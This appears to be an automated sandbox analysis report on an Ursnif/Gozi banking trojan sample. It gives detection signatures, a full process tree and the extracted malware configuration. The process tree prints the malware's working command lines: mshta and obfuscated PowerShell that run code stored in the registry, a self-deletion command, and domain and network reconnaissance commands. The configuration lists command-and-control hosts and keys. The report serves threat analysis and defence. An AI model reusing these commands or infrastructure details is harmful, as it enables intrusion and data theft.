Edit tour

Windows Analysis Report
Lx6.exe

Overview

General Information

Sample Name:	Lx6.exe
Analysis ID:	720586
MD5:	3b892bea0f8cbe0b61ee380743567d1d
SHA1:	90522132e3a97e966e5270a8e105cc33f0d6c4e5
SHA256:	6b722961edc010c5487de4ef7eee84b586ac3c3f06dbd1920935ea5f7bb90543
Tags:	185212471331947622560912135074exeGoziOpendirtel12-msn-com
Infos:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Dot net compiler compiles file from suspicious location

Antivirus / Scanner detection for submitted sample

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Uses nslookup.exe to query domains

Writes or reads registry keys via WMI

Uses net.exe to modify the status of services

Machine Learning detection for sample

Allocates memory in foreign processes

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Writes registry values via WMI

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Self deletion via cmd or bat file

Changes memory attributes in foreign processes to executable or writable

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Performs a network lookup / discovery via net view

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Antivirus or Machine Learning detection for unpacked file

Drops certificate files (DER)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Too many similar processes found

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Searches for the Microsoft Outlook file path

Drops PE files

Uses a known web browser user agent for HTTP communication

Uses reg.exe to modify the Windows registry

Queries the current domain controller via net

Compiles C# or VB.Net code

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Sample file is different than original file name gathered from version info

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

Lx6.exe (PID: 1172 cmdline: C:\Users\user\Desktop\Lx6.exe MD5: 3B892BEA0F8CBE0B61EE380743567D1D)

control.exe (PID: 3692 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 4672 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

mshta.exe (PID: 6016 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ccqf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ccqf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 4292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 1264 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 1312 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 1236 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 5656 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5948 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

RuntimeBroker.exe (PID: 3124 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 5760 cmdline: cmd /C "wmic computersystem get domain |more > C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 5296 cmdline: wmic computersystem get domain MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

more.com (PID: 5996 cmdline: more MD5: 28E3DD812331E39AFC3C2B30606E2971)

cmd.exe (PID: 2176 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RuntimeBroker.exe (PID: 4372 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 3960 cmdline: cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

systeminfo.exe (PID: 5140 cmdline: systeminfo.exe MD5: 57D183270FD28D0EBF6C2966FE450739)

RuntimeBroker.exe (PID: 4552 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 3540 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5832 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1020 cmdline: cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

net.exe (PID: 4120 cmdline: net view MD5: 15534275EDAABC58159DD0F8607A71E5)

cmd.exe (PID: 1920 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 5836 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 1716 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 3536 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5240 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cmd.exe (PID: 2756 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5240 cmdline: cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5652 cmdline: nslookup 127.0.0.1 MD5: AF1787F1DBE0053D74FC687E7233F8CE)

cmd.exe (PID: 5444 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4680 cmdline: cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

tasklist.exe (PID: 3064 cmdline: tasklist.exe /SVC MD5: B12E0F9C42075B4B7AD01D0B6A48485D)

cmd.exe (PID: 3664 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4708 cmdline: cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

driverquery.exe (PID: 5316 cmdline: driverquery.exe MD5: 52ED960E5C82035A6FD2E3E52F8732A3)

cmd.exe (PID: 1028 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2736 cmdline: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 4492 cmdline: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 5176 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1316 cmdline: cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

net.exe (PID: 5880 cmdline: net config workstation MD5: 15534275EDAABC58159DD0F8607A71E5)

net1.exe (PID: 5184 cmdline: C:\Windows\system32\net1 config workstation MD5: AF569DE92AB6C1B9C681AF1E799F9983)

cmd.exe (PID: 4584 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4532 cmdline: cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nltest.exe (PID: 5620 cmdline: nltest /domain_trusts MD5: 3198EC1CA24B6CB75D597CEE39D71E58)

cmd.exe (PID: 504 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 3736 cmdline: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nltest.exe (PID: 3852 cmdline: nltest /domain_trusts /all_trusts MD5: 3198EC1CA24B6CB75D597CEE39D71E58)

cmd.exe (PID: 3576 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2468 cmdline: cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

net.exe (PID: 5000 cmdline: net view /all /domain MD5: 15534275EDAABC58159DD0F8607A71E5)

cmd.exe (PID: 2800 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4108 cmdline: cmd /C "net view /all >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "t3qotb1uLz0WQBQfwLqib6qEJZE+UWboYbVA8D0wT+tWlc5qtQDeaqzOC2nQDK16TGqueaW5oGs4CGiO/MdFt2KusjJx8+1kpFAzW86uZJOIIf4iTEkhS3MyiIa/Q7lcVfHfnxpB+UbYYggJs5GX2bL7AmnKln9+gOVwUuO7JAeDw+DtYHnZsQ5QWiILRjbhzgULABNMELryH3vhxO50soxjs3xWLliZ7NkotkIovW5lDNqd0O2XXyoOurxXjuZGPEbbhRZBpHdWEhqREXH1enS9abglL6UWQWXDddw6a+cdOzlsIkv4dFlHNnlldLue5uJRFh2QmHZUYokW7tGSKTbEnFyrm9DfIThSGsj+rn4=", "c2_domain": ["tel12.msn.com", "194.76.225.60", "185.212.47.133"], "botnet": "1900", "server": "50", "serpent_key": "0FL5S9PzrGv40a6p", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x6c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4f2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x11f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x1f5:$a6: http://constitution.org/usdeclar.txt 0x37a:$a7: grabs= 0x84c:$a8: CHROME.DLL 0x1c9:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 